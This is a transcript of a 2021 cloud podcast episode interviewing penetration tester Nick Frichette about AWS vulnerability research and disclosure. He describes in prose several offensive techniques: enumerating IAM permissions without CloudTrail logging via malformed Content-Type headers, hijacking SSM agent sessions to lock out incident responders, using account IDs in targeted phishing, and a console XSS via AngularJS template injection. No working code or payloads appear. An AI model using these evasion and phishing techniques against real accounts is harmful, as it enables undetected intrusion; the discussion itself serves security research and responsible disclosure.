Screaming in the Cloud - Hacking AWS in Good Faith with Nick Frichette
Episode Date: July 1, 2021About NickNick Frichette is a Penetration Tester and Team Lead for State Farm. Outside of work he does vulnerability research. His current primary focus is developing techniques for AWS explo...itation. Additionally he is the founder of hackingthe.cloud which is an open source encyclopedia of the attacks and techniques you can perform in cloud environments.Links:Hacking the Cloud: https://hackingthe.cloud/Determine the account ID that owned an S3 bucket vulnerability: https://hackingthe.cloud/aws/enumeration/account_id_from_s3_bucket/Twitter: https://twitter.com/frichette_nPersonal website:https://frichetten.com
Transcript
Discussion (0)
Hello, and welcome to Screaming in the Cloud, with your host, Chief Cloud Economist at the
Duckbill Group, Corey Quinn.
This weekly show features conversations with people doing interesting work in the world
of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles
for which Corey refuses to apologize.
This is Screaming in the Cloud.
This episode is sponsored in part by Thinkst.
This is going to take a minute to explain, so bear with me.
I linked against an early version of their tool, canarytokens.org, in the very early days of my newsletter.
And what it does is relatively simple and straightforward. It winds up embedding credentials, files, that sort of thing in various
parts of your environment, wherever you want to. It gives you fake AWS API credentials, for example.
And the only thing that these things do is alert you whenever someone attempts to use those things.
It's an awesome approach. I've used something similar for years. Check them out. But wait, there's more. They also have an enterprise option that you should be very much
aware of. Canary.tools. You can take a look at this, but what it does is it provides an enterprise
approach to drive these things throughout your entire environment. You can get a physical device
that hangs out on your network and impersonates whatever you want to. When it gets NMAP scanned or someone attempts to log into it or access files on it, you get instant alerts.
It's awesome.
If you don't do something like this, you're likely to find out that you've gotten breached the hard way.
Take a look at this.
It's one of those few things that I look at and say, wow, that is an amazing idea.
I love it.
That's canarytokens.org and canary.tools.
The first one is free.
The second one is enterprise-y.
Take a look.
I'm a big fan of this.
More from them in the coming weeks. from serverless, you know that if there's one thing that can be said universally about these
applications, it's that it turns every outage into a murder mystery. Lumigo helps make sense
of all of the various functions that wind up tying together to build applications. It offers
one-click distributed tracing so you can effortlessly find and fix issues in your
serverless and microservices environment. You've created more problems for yourself? Make one of them go away.
To learn more, visit Lumigo.io.
Welcome to Screaming in the Cloud. I'm Corey Quinn.
I spend a lot of time throwing things at AWS in varying capacities.
One area I don't spend a lot of time giving them grief is in the InfoSec world,
because as it turns out, they, and almost everyone else, doesn't have much of a sense of humor around things like security.
My guest today is Nick Frechette, who's a penetration tester and team lead for State Farm. Nick, thanks for joining me.
Hey, thank you for inviting me on.
So like most folks in InfoSec, you tend to have a bunch of different, I guess, titles
or roles that hang on signs around someone's neck.
And it all sort of distills down on some level, in your case at least, and please correct
me if I'm wrong, to cloud security researcher.
Is that roughly correct, or am I missing something fundamental?
Yeah.
So for my day job, I do penetration testing, and that kind of puts me up against a variety of things, from web applications to client-side applications to sometimes the cloud.
In my free time, though, I like to spend a lot of time on security research, and most recently I've been focusing pretty heavily on AWS.
So let's start at the very beginning.
What is a cloud security researcher?
What is it you'd say it is you do here, for lack of a better phrasing?
Well, to be honest, the phrase security researcher or cloud security researcher has been kind
of, I guess, like watered down in recent years.
Everybody likes to call themselves a researcher in some way or another.
You have some folks who participate in the bug bounty programs.
So for example, GCP and Azure have their own bug bounties.
AWS does not, I'm not too sure why.
And so they want to find vulnerabilities
with the intention of getting cash compensation for it.
You have other folks who are interested
in doing security research to try
and better improve defenses and alerting and monitoring
so that
when the next major breach happens, they're prepared or they'll be able to stop it ahead
of time. From what I do, I'm very interested in offensive security research. So how can I,
as a penetration tester or a red teamer, or I guess an actual criminal, how can I take advantage
of AWS or try to avoid detection
from services like GuardDuty and CloudTrail? So let's break that down a little bit further.
I've heard the term of red team versus blue team used before. Red team presumably is the
offensive security folks. And yes, some of those people are in fact quite offensive.
And blue team is the defense side. In other words, keeping folks out. Is that a reasonable
summation of the state of the world? It can be, yeah, especially when it comes to security. blue team is the defense side. In other words, keeping folks out. Is that a reasonable summation
of the state of the world? It can be, yeah, especially when it comes to security. One of
the nice parts, you know, about the whole InfoSec field, I know a lot of folks tend to kind of
just say like, oh, they're there to prevent the next breach. But in reality, InfoSec has a ton
of different niches and different job specialties. Blue teamers, quote unquote, tend to be the defense side working on ensuring that we can alert and monitor potential attacks, whereas red teamers
or penetration testers tend to be the folks who are trying to do the actual exploitation or develop
techniques to do that in the future. So you talk a bit about what you do for work, obviously, but
what really drew my notice was
stuff you do that isn't part of your core job as best I understand it. You're focused on
vulnerability research, specifically with a strong emphasis on cloud exploitation, as you said,
AWS in particular, and you're the founder of Hacking the Cloud, which is an open source
encyclopedia of various attacks and techniques you can perform
in cloud environments. Tell me about that. Yeah, so hacking the cloud came out of a frustration I
had when I was first getting into AWS, that there didn't seem to be a ton of good resources for
offensive security professionals to get engaged in the cloud. By comparison, if you wanted to learn about web application hacking
or attacking Active Directory or reverse engineering,
if you have a credit card, I can point you in the right direction.
But there just didn't seem to be a good course
or introduction to how you as a penetration tester should attack AWS.
There's things like open S3 buckets are a nightmare
or that server-side request forgery on an EC2 instance
can result in your organization being fined very, very heavily.
I kind of wanted to go deeper with that.
And with hacking the cloud,
I've tried to sort of gather a bunch of offensive security research
from various blog posts and conference talks
into a single location so that both the offense side and the defense side a bunch of offensive security research from various blog posts and conference talks into
a single location so that both the offense side and the defense side can kind of learn from it
and leverage that to either improve defenses or look for things that they can attack.
It seems to me that doing things like that is not likely to wind up making a whole heck of a lot of
friends over on the cloud provider side. Can you talk a little
bit about how what you do is perceived by the companies you're focusing on?
Yeah. So in terms of relationship, I don't really have too much of an idea of what they think.
I have done some research and written on my blog, as well as published to Hacking the Cloud, some techniques for doing
things like abusing the SSM agent, as well as abusing the AWS API to enumerate permissions
without logging to CloudTrail. And ironically, through the power of IP addresses, I can see
when folks from the Amazon corporate IP address space look at my blog. And that's always fun,
especially when there's like four in the course of a couple of minutes or five or six. But I don't really know too much about what they
or how they view it or if they think it's valuable at all. I hope they do, but really not too sure.
I would imagine that they do on some level. But I guess the big question is, you know that someone
doesn't like what you're doing when they send cease and desist notices or have the police knock on your door. I feel like at most levels, we're past that in an InfoSec level. At least,
I'd like to believe we are. We don't hear about that happening all too often anymore.
But what's your take on it? Yeah, I definitely agree. I definitely think we are beyond that.
Most companies these days know that vulnerabilities are going to happen no matter how hard you try
and how much money you spend. And so it's better to be accepting of that and open to it. And
especially because the InfoSec community can be so, say, noisy at times, it's definitely worth it to
pay attention, definitely be appreciative of the information that may come out. EWS is pretty
awesome to work with, having disclosed to them a
couple times now. They have a safe harbor provision, which essentially says that so long as you're
operating in good faith, you're allowed to do security testing. They do have some rules around
that, but they are pretty clear in terms of if you were operating in good faith, you wouldn't be doing
anything like that. It tends to be pretty obviously malicious things that they'll ask you to stop. So talk to me a little bit about what
you've found lately and been public about. There have been a number of examples that have come up
whenever people start Googling your name or looking at things you've done. But what's happening
lately? What have you found that's interesting? Yeah, so I think most recently, the thing that's
kind of gotten the most attention has been a really interesting bug I found in the AWS API.
Essentially, kind of the core of it is that when you are interacting with the API, obviously,
that gets logged to CloudTrail so long as it's compatible. So if you are successful, say you want
to do like Secrets Manager, list secrets, that shows up in CloudTrail. And. So if you are successful, say you want to do like secrets manager list secrets,
that shows up in CloudTrail. And similarly, if you do not have that permission on a role or user,
and you try to do it, that access denied also gets logged to CloudTrail. Something kind of
interesting that I found is that by manually modifying requests or malforming them, what we
can do is we can modify the content type header.
And as a result, when you do that, you can provide literally gibberish.
I think I have a VS Code window here somewhere with a content type of meow.
When you do that, the AWS API knows the action that you're trying to call.
But because of that messed up content type, it doesn't know exactly what you're trying to do.
And as a result, it doesn't get logged to CloudTrail.
Now, while that may seem kind of weirdly specific
and not really like a concern,
the nice part of it though, is that for some API actions,
somewhere in the neighborhood of 600,
I say in the neighborhood of just because it fluctuates
over time, as a result of that,
you can tell if you have that permission or if you don't
without that being logged to
CloudTrail. And so we can do this enumeration of permissions without somebody in the defense side
seeing us do it, which is pretty awesome from an offensive security perspective.
On some level, it would be easy to say, well, just not showing up in the logs isn't really
a security problem at all. I'm going to guess that you disagree.
I do, yeah. So let's sort of look at it from a real-world perspective. You know, let's say,
Corey, you're tired of saving people money on their AWS bill. You'd instead maybe want to make a little money on the side, and you're okay with perhaps, you know, committing some crimes to do
it. Through some means, you get access to a company's AWS
credentials for some particular role, whether that's through remote code execution on an EC2
instance, or maybe you find them in an open location like an S3 bucket or a Git repository,
or maybe you phish a developer. Through some means, you have an access key and a secret access
key. The new problem that you have is that you don't know what
those credentials are associated with or what permissions they have. They could be the root
account keys, or they could be, you know, literally locked down to a single S3 bucket to read from.
It all just kind of depends. Now, historically, your options for figuring that out are kind of
limited. Your best bet would be to brute force the AWS API using a
tool like Paku or my personal favorite, which is Enumerate IEM by Andres Rancho. And what that
does is it just tries a bunch of API calls and sees which one works and which one doesn't. And
if it works, you clearly know that you have that permission. Now, the problem with that, though,
is that if you were to do that, that's going to light
up CloudTrail like a Christmas tree.
It's going to start showing all these access denies for these various API calls that you've
tried.
And obviously any defender who's paying attention is going to look at that and go, okay, that's
a, that's suspicious.
And you're going to get shut down pretty quickly.
What's nice about this bug that I found is that instead of having to litter CloudTrail with all these logs, we can just do this enumeration for roughly 600-ish API actions across roughly 40 AWS services,
and nobody is the wiser. You can enumerate those permissions, and if they work, fantastic,
and you can then use them. And if you come to find you don't have any of those 600 permissions,
okay, then you can decide on where to go from there or maybe try to risk things showing up in CloudTrail.
CloudTrail is one of those services that I find incredibly useful, or at least I do in theory.
In practice, it seems that things don't show up there, and you don't realize that those types of activities are not being recorded until one day there's an announcement of, hey, that type of activity is now recorded.
As of the time of this recording, the most recent example of that in memory is data plane requests to DynamoDB.
It's, wait a minute, you mean that wasn't being recorded previously?
Huh, I guess it makes sense, but oh dear, and that causes a reevaluation of what's happening
from a security policy and posture perspective for some clients.
There's also, of course, the challenge that
CloudTrail logs take a significant amount of time to show up. It used to be over 20 minutes. I
believe now it's closer to 15, but don't quote me on that, obviously. Run your own tests,
which seems awfully slow for anything that's going to be looking at those in an automated
fashion and taking a reactive or remediation approach to things that show up there. Am I missing something key?
No, I think that is pretty spot on. And believe me, I am fully aware of how long CloudTrail takes
to populate, especially with doing a bunch of research on what is and what is not logged to
CloudTrail. I know that there are some operations that can be logged more quickly than the 15-minute
average. Off the top of my
head, though, I actually don't quite remember what those are. But you're right. In general,
the majority, at least, do take quite a while. And that's definitely time in which an adversary
or someone like me could maybe take advantage of that 15-minute window to try and brute force
those permissions, see what we have access to, and then try to operate and get out with whatever
goodies we've managed to steal.
Let's say that you're doing the thing that you do, however that comes to be.
And I am curious, actually we'll start there.
I am curious, how do you discover these things?
Is it looking at what is presented and then figuring out, huh, how can I wind up subverting the system it's based on?
And similar to the way that I take a look at any random AWS services
and try and figure out how to use it as a database.
How do you find these things?
Yeah, so to be honest, it all kind of depends.
Sometimes it's completely by accident.
So for example, the API bug I described about not logging to CloudTrail,
I actually found that due to copy and pasting code from AWS's website,
and I didn't change the content type header.
And as a result, I happened to notice this weird behavior and kind of took advantage of it.
Other times, it's thinking a little bit about how something is implemented and sort of the security ramifications of it.
So, for example, the SSM agent, which is a phenomenal tool in order to do remote access on your EC2 instances, I was sitting there one day
and just kind of thought, hey, how does that authenticate exactly? And what can I do with it?
Sure enough, it authenticates the exact same way that the AWS API does, that being like the
metadata service on the EC2 instance. And so what I figured out pretty quickly is, even if you can
get access to an EC2 instance,
even as a low privilege user, or you can do service site request forgery to get the keys,
or if you just have sufficient permissions within the account, you can potentially intercept SSM
messages from like a session and provide your own results. And so in effect, if you've compromised
an EC2 instance, and the only, say, incident response has into that
box is SSM, you can effectively lock them out of it and kind of do whatever you want in the meantime.
That seems like it's something of a problem.
It definitely can be, but it is a lot of fun to play keep away with incident response.
I'd like to reiterate that this is all in environments you control and have permissions to be operating within.
It is not recommended that people pursue things like this in other people's cloud environments without permissions.
I don't want to find us sued for giving crap advice, and I don't want to find listeners getting arrested because they didn't understand the nuances of what we're talking about.
Yes, absolutely. Getting legal approval is really important for
any kind of penetration testing or red teaming. I know some folks sometimes might get carried away,
but definitely be sure to get approval before you do any kind of testing.
So how does someone report a vulnerability to a company like AWS?
So AWS, at least publicly, doesn't have any kind of bug bounty program. But what they do have is a
vulnerability disclosure program. And that is essentially a email address that you can contact
and send information to. And that'll act as your point of contact with AWS while they investigate
the issue. And at the end of their investigation, they can report back with their findings, whether
they agree with you, and they are working to get that patched or fixed immediately, or if they disagree with you and think that everything is hunky-dory, or if you
may be mistaken. I saw a tweet the other day that I would love to get your thoughts on, which said
effectively that if you don't have a public bug bounty program, then any way that a researcher
chooses to disclose the vulnerability is
definitionally responsible on their part because they don't owe you any particular duty of care.
Responsible disclosure, of course, is also referred to as coordinated vulnerability disclosure because
we're always trying to reinvent terminology in this space. What do you think about that? Is there
a duty of care from security researchers to responsibly disclose the vulnerabilities they find or coordinate
those vulnerabilities with vendors in the absence of a public bounty program on turning those things
in? Yeah, you know, I think that's a really difficult question to answer. From my own
personal perspective, I always think it's best to contact the developers or the
company or whoever maintains whatever you've found a vulnerability in. Give them the best shot to have
it fixed or repaired. Obviously, sometimes that works great and the company is super receptive
and they're willing to patch it immediately. And other times they just don't respond or sometimes
they respond harshly. And so depending on the situation,
it may be better for you to release it publicly with the intention that you're informing folks
that this particular company or this particular project may have an issue. On the flip side,
I can kind of understand, although I don't necessarily condone it, why folks pursue things
like exploit brokers, for example. So, you know, if a company doesn't have
a bug bounty program and the researcher isn't expecting any kind of like cash compensation,
I can understand why they may spend tens of hours, maybe hundreds of hours tracing down a
particularly impactful vulnerability only to maybe write a blog post about it or get a little head
pat and say, thanks, nice work. And so I can
see why they may pursue things like selling it to an exploit broker who may pay them a hefty sum if
it is orders of magnitude more. It's, oh, good. You found a way to remotely execute code across
all of EC2 in every region. That is a hypothetical. Don't email me. Have a t-shirt. It seems like you
could basically buy all the t-shirts for what that is worth on the
exploit market. Yes, absolutely. And I do know from some experience that folks will reach out
to you and are interested in particularly some cloud exploits. Nothing like minor, like some
of the things that I found, but more thinking more of like accessing resources without anybody
knowing or accessing resources cross-account.
That could go for quite a hefty sum.
This episode is sponsored by ExtraHop.
ExtraHop provides threat detection and response for the enterprise, not the starship.
On-prem security doesn't translate well to cloud or multi-cloud environments,
and that's not even counting IoT.
ExtraHop automatically discovers everything
inside the perimeter, including your cloud workloads and IoT devices, detects these threats
up to 35% faster, and helps you act immediately. Ask for a free trial of detection and response
for AWS today at extrahop.com slash trial. It always feels squeaky on some level to discover something like this.
That's kind of neat and wind up selling it to basically some arguably terrible people. Maybe
we don't know who's buying these things from the exploit broker counterpoint, having reported a
few security problems myself to various providers, you get an auto responder, then you get a thank
you email that goes into a
bit more detail for the well-run programs, at least. And invariably, the company's position
is, is whatever you found is not as big of a deal as you think it is, and therefore they see no
reason to publish it or go loud with it. Wouldn't you agree? Because on some level, their entire
position is, please don't talk about any security shortcomings
that you may have discovered in our system.
And I get why they don't want that going loud,
but by the same token,
security researchers need a reputation
to continue operating on some level in the market
as security researchers, especially independents,
especially people who are trying to make names
for themselves in the first place.
Yeah.
How do you resolve that dichotomy yourself?
Yeah, so from my perspective, you know, I totally understand why a company or a project wouldn't want you to publicly disclose an issue.
Everybody wants to look good, and nobody wants to be called out for any kind of issue that may have been unintentionally introduced.
I think the thing at the end of the day, though, from my perspective, you know, if I, as some random guy in the middle of nowhere,
Illinois, finds a bug, or to be frank, if anybody out there finds a vulnerability in something,
then a much more sophisticated adversary is equally capable of finding such a thing.
And so it's better to have these things out in the open and discussed rather than hidden away,
so that we have the best
chance of anybody being able to defend against it or develop detections for it rather than just kind
of being like okay the the vendor didn't like what i had to say i guess i'll go back to doing whatever
whatever things i normally do you've obviously been doing this for a while and i'm going to
guess that your entire security researcher career has not been focused on cloud environments in general, and AWS in particular.
Yes, I've done some other stuff in relation to abusing GitLab runners.
I also happen to find a pretty neat RCE and privilege escalation in the very popular open source project, PyHole.
Not sure if you have any experience with that.
Oh, I run it myself all the time for various DNS blocking purposes and other sundry bits of
nonsense. Oh, yes. Good. What I'm trying to establish here is that this is not just one or
two companies that you've worked with. You've done this across the board, which means I can
ask a question without naming and shaming anyone even implicitly. What differentiates good
vulnerability disclosure programs from terrible ones?
Yeah, I think the major differentiator is the reactivity of the project, as in how quickly
they respond to you.
There are some programs I've worked with where you disclose something, maybe even that might
be of a high severity, and you might not hear back for weeks at a time.
Whereas there are other programs, particularly like the MSRC, which is a part of Microsoft, or with AWS's disclosure program, where within
the hour, I had a receipt of, hey, we received this, we're looking into it.
And then within a couple hours after that, yep, we verified it, we see what you're seeing,
and we're going to look at it right away.
I think that's definitely one of the major differentiators for programs.
Are there any companies you'd like to call out
in either direction?
And no is a perfectly valid answer to this one,
for having excellent disclosure programs
versus terrible ones?
I don't know if I'd like to call anybody out negatively,
but in support, I've definitely appreciated working
with both AWS's and the MSRC and Microsoft's.
I think both of them have done a pretty fantastic job,
and they definitely know what they're doing at this point.
Yeah, I must say that I primarily focus on AWS and have for a while, which should be
blindingly obvious to anyone who's listened to me talk about computers for more than three and a
half minutes. But my experiences with the security folks at AWS have been uniformly positive. Even
when I find things that they don't want me talking about that I will be talking about regardless, they've always been extremely respectful. And I've never walked away from the conversation thinking that I was somehow cheated by the experience. and reinvent. I got to give a talk around something I reported specifically about how AWS runs its
vulnerability disclosure program with one of their security engineers, Zach Glick. And he was
phenomenally transparent around how a lot of these things work and what they care about and how they
view these things and what their incentives are. And obviously being empathetic to people reporting
things in with the understanding that there is no duty of care that when security researchers discover something, they then must immediately
go and report it and return for a pat on the head and a thank you. It was really neat being able to
see both sides simultaneously around a particular issue. I'd recommend it to other folks, except I
don't know how you make that lightning strike twice. It's very, very wise, yes. Thank you. I do my best.
So what's next for you?
You've obviously found a number of interesting vulnerabilities
around information disclosure.
One of the more recent things that I found
that was sort of neat as I trolled the internet,
I don't believe it was yours,
but there was a ability to determine the account ID
that owned an S3 bucket by enumerating via binary search.
Did you catch that at all?
I did. That was by Ben Britz, which is a pretty awesome technique,
and that's been something I've been kind of interested in for a while.
There is an ability to enumerate users' roles
and service link roles inside an account,
so long as you know the account ID.
The problem, of course, is getting the account ID. So when Ben put that out there, I was like super stoked about being
able to leverage that now for enumeration and maybe some fun phishing tricks with that.
I love the idea. I love seeing that sort of thing being conducted. And AWS's official policy,
as best I remember when I looked at this once, account IDs are not considered
confidential. Do you agree with that? Yep, that is my understanding of how AWS views it.
From my perspective, having an account ID can be beneficial. I mentioned that you can enumerate
users' roles and service-linked roles with it, and that could be super useful from a phishing
perspective. You know, the average phishing email looks like, oh, you want an iPad or, oh, you know, you're the 100th
visitor of some website or something like that. But imagine getting an email that looks like it's
from something like EWS, you know, developer support or from some research program that
they're doing. And they can say to you like, hey, we see that you have these roles in your account with account ID such and such, and we know that you're using EKS and
you're using ECS, that phishing email becomes a lot more believable when suddenly this outside
party seemingly knows so much about your account. And that might be something that you would think,
oh, well, only a real AWS employee or AWS would know that.
So from my perspective, I think it's best to try and keep your account ID secret.
I actually redact it from every screenshot that I publish, or at the very least, I try to.
At the same time, though, it's not the kind of thing that's going to get somebody in your account in a single step. So I can totally see why some folks aren't too concerned about it. I feel like we also got a bit of a red herring coming from AWS blog posts themselves,
where they always will give screenshots explaining what they do and redact the account ID in every
case. And the reason that I was told at one point was that, oh, we have an internal provisioning
system that's different, it looks different, and I don't want to confuse people
whenever I wind up doing a screenshot.
And that's great, and I appreciate that.
And part of me wonders on one level,
how accurate is that?
Because sure, I understand
what you don't necessarily want to distract people
with something that looks different.
But then I found out that the system is called Isengard.
And yeah, it's great.
They've mentioned it periodically
in blog posts and talks and the rest. And part of me now wonders, oh, wait a minute. Is it actually
because they don't want to disclose the differences between those systems? Or is it because they don't
have license rights publicly to use the word Isengard and don't want to get sued by whoever
owns the rights to the Lord of the Rings trilogy? So one wonders what the real incentives are in
different cases. But I've always viewed account IDs as being the sort of thing that you probably don't want to share them around all the time, but it also doesn't necessarily hurt.
Exactly. Yeah, it's, you know, it's not the kind of thing you want to share with the world immediately, but it doesn't really hurt in the end. early time when the partner network was effectively determining tiers of partner by how much spend
they influenced. And the way that you demonstrated that was by giving account IDs for your client
accounts. The only verification at the time, to my understanding, was that, yep, that mapped to
the client you said it did, and that was it. So I can understand back in those days not wanting to
muddy those waters, but those days are also long past.
So I get it. I'm not going to be the first person to advertise mine, but if you can discover my account ID by looking at a bucket, it doesn't really keep me up at night. So all of those
things considered, we've had a pretty wide ranging conversation here about a variety of things.
What's next? What interests you as far as where you're going to start looking and exploring and
exploiting, as the case may be, various cloud services? Hack the dot cloud, which there's the
dot in there, which also turns into a domain, excellent choice, is absolutely going to be a
great collection for a lot of what you find and for other people to contribute and learn from one
another. But where are you aimed at? What's next?
Yeah, so one thing I've been really interested in has been fuzzing the AWS API.
As anyone who's ever used AWS before knows is that there are hundreds of services
with thousands of potential API endpoints.
And so from a fuzzing perspective, there is a wide variety of things
for us to potentially affect or potentially find
vulnerabilities in. I'm currently working on a library that will allow me to make that fuzzing
a lot easier. You could use things like BotaCore, Bota3, like some of the AWS SDKs. The problem,
though, is that those are designed for sort of like the happy path where you can format your
quest the way Amazon wants. As a
security researcher or as someone doing fuzzing, I kind of want to send random gibberish sometimes,
or I want to malform my requests. And so that library is still in production, but it has already
resulted in a bug. While I was fuzzing part of the AWS API, I happened to notice that I broke
Elastic Beanstalk, quite literally. when I was going through the AWS console,
I got the big red error message of
b.requestparameters is null.
And I was like, huh, why is it null?
And come to find out as a result of that,
there is a HTML injection vulnerability in the Elastic,
well, there was a HTML injection vulnerability
in the Elastic Beanstalk for the AWS console.
Pivoting from there, the Elastic Beanstalk uses Angular 1.8.1,
or at least it did when I found it.
As a result of that, we can modify that HTML injection
to do template injection.
And for the AngularJS crowd, template injection
is basically cross-site scripting,
because there is no sandbox anymore, at least
in that version.
And so as a result of that, I was
able to get cross-site scripting in the AWS console,
which is pretty exciting.
That doesn't tend to happen too frequently.
No, that is not a typical issue that winds up getting disclosed very often.
Definitely, yeah.
And so I was excited about it.
And considering the fact that my library for fuzzing is literally not even halfway done
or is barely halfway done. I'm
looking forward to what other things I can find with it. I look forward to reading more. And at
the time of this recording, I should point out that this has not been finalized or made public.
So I'll be keeping my eyes open to see what happens with this. And hopefully this will be
old news by the time this episode drops. If not, well, this might be an interesting episode
once it goes out.
Yeah, I hope they'd have it fixed by then.
They haven't responded to it yet,
other than the, hi, we've received your email.
Thanks for checking in, but we'll see how that goes.
Watching news as it breaks is always exciting.
If people want to learn more about what you're up to
and how you
go about things, where can they find you? Yeah, so you can find me in a couple different places.
On Twitter, I'm Frechette underscore N. I also write a blog where I contribute a lot of my
research at FrechetteN.com, as well as Hacking the Cloud. I contribute a lot of the AWS stuff
that gets thrown on there. And it's also open source. So if anyone else would like to contribute
or share their knowledge,
you're absolutely welcome to do so.
Pull requests are open
and excited for anyone to contribute.
Excellent.
And we will, of course,
include links to that in the show notes.
Thank you so much for taking the time to speak with me.
I really appreciate it.
Yeah, thank you so much for inviting me on.
I had a great time.
Nick Frechette, Penetration Tester
and Team Lead for State Farm.
I'm cloud economist Corey Quinn, and this is Screaming in the Cloud.
If you've enjoyed this podcast, please leave a five-star review on your podcast platform of choice.
Whereas if you've hated this podcast, please leave a five-star review on your podcast platform of choice,
along with a comment telling me why none of these things are actually vulnerabilities,
but simultaneously should not be discussed in public ever.
If your AWS bill keeps rising and your blood pressure is doing the same,
then you need the Duck Bill Group.
We help companies fix their AWS bill by making it smaller and less horrifying.
The Duck Bill Group works for you, not AWS.
We tailor recommendations to your business and we get to the point. Visit duckbillgroup.com to get
started. This has been a humble pod production
stay humble